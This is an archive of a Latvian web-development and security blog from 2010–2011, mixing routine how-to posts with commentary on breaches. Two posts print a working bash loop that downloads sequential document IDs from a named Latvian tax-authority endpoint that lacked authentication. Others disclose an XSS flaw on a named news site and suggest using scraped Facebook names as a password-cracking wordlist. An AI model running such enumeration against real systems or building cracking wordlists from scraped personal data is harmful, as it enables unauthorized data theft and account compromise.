Category Archives: Web

User friendly url

Posted on februāris 7, 2011 | Leave a comment

Ir elegants veids kā izveidot lietotājam draudzīgu url pat gadījumā, ja mājas lapas CRM to nepieļauj un nav iespējams veikt izmaiņas servera konfigurācijā (uzstādīt server side redirection ar .htaccess vai .config).
Piemēram, ja ir lapa, kura neuztur lietotājam draudzīgus url- http://kautkas.lv/?i=3 un ir nepieciešams, lai adrese izskatītos- http://kautkas.lv/atrodi-sevi/
Tad to var izdarīt izveidojot direktoriju atrodi-sevi un tajā ievietojot failu index.php ar saturu:
<blockquote><code>
<HTML>
<HEAD>
<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://kautkas.lv/?i=3″>
</HEAD>
<BODY>
</BODY>
</HTML></code> </blockquote>

Jāatceras, ka šāda adrese ir tikai lietotājiem draudzīga, nevis meklētājiem.

→ Leave a comment

Posted in How to, Interesanti, Kopums, PHP, Web

Tagged , ,

www.zz.lv un XSS

Posted on janvāris 17, 2011 | 1 Comment

Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.
Par XSS var palasīt:

http://hakipedia.com/index.php/Cross_Site_Scripting
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://ha.ckers.org/xss.html
http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html

→ 1 Comment

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, PHP

Tagged , , , , , , , , , ,

Joomla 1.6

Posted on janvāris 16, 2011 | 2 Comments

Ir iznākusi Joomlas CMS 1.6 versija, kurā ir vairākas izmaiņas- daudz kas palicis ērtāk lietojams un jaunas iespējas. Pamēģināt paeksperimentēt var te.

→ 2 Comments

Posted in Joomla, Kopums, Web

Tagged ,

www.atlaizuklubs.lv SQL kļūda

Posted on decembris 29, 2010 | 3 Comments

Šorīt apmeklējot www.atlaizuklubs.lv atklājās medusmaize- SQL kļūdas paziņojums no kuras var izsecināt daļu no datubāzes uzbūves.
Pēc visa spriežot uz servera aptrūkās vieta.
Konkrētā gadījumā izskatās pēc divām klasiskām kļūdām:
1. Nav atslēgta kļūdu izvadīšana (nepieciešama izstrādes posmā, bet ne produkcijas serveros).
2. Un nebija uzstādīts servera disk space monitorings (alerts).

→ 3 Comments

Posted in Drošība, Drošības caurumi, How to, Interesanti, Kopums, SQL, Web

Tagged , , , , , , , , ,

Publisks cron serveris?

Posted on decembris 27, 2010 | 3 Comments

Vai kāds zina kādu publisku cron serveri, kas ļautu ar noteiktu regularitāti izsaukt kādu WEB lapu?
Mēģināju atrast google.com, bet neizdevās, varbūt kāds var pateikt?

→ 3 Comments

Posted in How to, Interesanti, Kopums, PHP

Tagged ,

Izraksts no PHP un MySql

Posted on decembris 26, 2010 | Leave a comment

Dažas pamat lietas no php.net, lai katru reizi nav jāmeklē kā pārbaudīt vai tabulā ir meklējamie ieraksti.

< ?php
$conn = mysql_connect("localhost", "mysql_user", "mysql_password");
Continue reading

→ Leave a comment

Posted in MySQL, PHP

Tagged ,

Drupal stress test

Posted on septembris 19, 2010 | Leave a comment

Googlējot uzdūros interesantam materiālam par stress testa veikšanu drupal Web lapai.
Materiāli tādi ir daudz, bet šis likās interesants, jo stāstīja par economist, laikrakstu, kuru bieži lasu un kam ikdienas apmeklējums ir tāds, par kuru LV projekti var tikai sapņot.
Papildus tam tiek pastāstīts par tehniskiem risinājumiem, kuri izmantoti, lai tādu mostru paceltu.
Video filmēts Drupal konferences laikā.
Links uz video ir te.

→ Leave a comment

Posted in Apmācība, Drupal, How to, Interesanti, Kopums

Tagged , , , ,

Bezmaksas hostings

Posted on augusts 12, 2010 | 1 Comment

Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.

Cerams kādam noderēs.

→ 1 Comment

Posted in Interesanti, Kopums, Web

Tagged , , ,

Mēģinām pielietot EDS konstatēto ievainojamību citur

Posted on augusts 10, 2010 | 3 Comments

Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.

Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.

Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.

Linux gadījumā tas varētu izskatīties šādā veidā:

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Continue reading

→ 3 Comments

Posted in Drošība, How to, Interesanti, Kopums, Linux, Web, Windows

Tagged , , , , , , , , , , ,

Pods izsmiets vai vēsture atkārtojas

Posted on augusts 6, 2010 | 10 Comments

Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.

Un te seko nākamais pārsteigums- pods izsmiets.

Nu ko vēsture atkārtojas..

Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.

Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.

Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.

Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV

No sava Hackera neaizbēgsi :) .

→ 10 Comments

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, Web, Wordpress

Tagged , , , , , , , ,

Boot bīstama lapa vai arī boot ticis izsmiets

Posted on augusts 6, 2010 | Leave a comment

Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.

Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.

Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.

Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas :)

→ Leave a comment

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, Web

Tagged , , , , , ,

Kā tika nolādēti dati no VID EDS sistēmas?

Posted on augusts 4, 2010 | 1 Comment

Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies

for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done

Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.

→ 1 Comment

Posted in Drošība, How to, Interesanti, Kopums, Linux, Web

Tagged , , , , , ,

Lejupielādēti un sistematizēti ap 100 miljonu facebook lietotāju datu

Posted on augusts 4, 2010 | Leave a comment

Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html

Raksta kopija:

Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.

An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.

Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.

Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:

Filename Description
-------------------------------------------------------------------------
facebook.rb The script used to generate these files (v1)
facebook.nse The script that will be used for the second pass (v2)
facebook-urls The full URLs to every profile
facebook-names-original All names, including duplicates
facebook-names-unique All names, no duplicates
facebook-names-withcount All names, no duplicates but with a count
facebook-firstnames-withcount All first names (with count)
facebook-lastnames-withcount All last names (with count)
facebook-f.last-withcount All first initial last name (with count)
facebook-first.l-withcount All first name last initial (with count)

Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.

No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.

Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.

Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.

P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?

Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.

→ Leave a comment

Posted in Drošība, Drošības caurumi, Interesanti, Kopums, Web

Tagged , , , ,

Atjaunojam wordpress

Posted on jūnijs 26, 2010 | Leave a comment

Pamanīju, ka ir iznākusi wordpress 3.0 versija un aktīvi sāku migrācijas procesu izmantojot oficiālo manuāli:

Tas sastāvēja no 5 soļiem:

  • Uztaisām lapas pilnu rezerves kopiju (mysql un failu),
  • Nolādējam jauno wordpress un to atarhivējam,
  • Izdzēšam wp-includes un wp-admin direktoijas,
  • kopējam pa virsu jaunos failus (izņemot wp-content direktoriju!!! tai jāsaglabājas vecajai),
  • Pirmo reizi logojoties administrēšanas panelī piedāvā izmainīt datubāzes struktūru, to izdarām.

Atjaunināšanas process ir beidzies veiksmīgi.

Ērtāk noteikti būtu izmantot automātisko atjaunināšanas fīču- tiem, kas nav nogriezuši apache lietotājam tiesības rakstīt/dzēst.

Uz ātro nekādas lielas izmaiņas neredzu, ja nu vienīgi administrēšanas panelī background no tumši pelēka ir pārvērties gaiši pelēkā un apziņa- lietoju jaunāko :)

Papildinājums- aiz intereses sameklēju, kas tad ir īsti jauns 3.0 versijā un kā izrādās ļoti daudz un būtiskas izmaiņas, no kurām man šķita svarīgākās:

  • izvēlēties lietotājvārdu instalācijas laikā- jo pēc tam nav jāveido jauns lietotājs un jādzēš ārā admin,
  • plašākas pielāgošanas iespējas, kas samazina nepieciešamību labot wordpress failus manuāli (kas man ļoti kaitināja salīdzinot wordpress ar joomlu, kur gandrīz visu varēja izdarīt nelienot pašā kodā).

→ Leave a comment

Posted in Drošība, How to, Interesanti, Wordpress

Tagged , ,

Second step in forensic investigation vai hackeri uzbrūk 2

Posted on maijs 16, 2010 | 1 Comment

Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.

Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:

Continue reading

→ 1 Comment

Posted in Drošība, How to, Interesanti, Kopums, Web, Wordpress

Tagged , , , , , , , , , , , , , , ,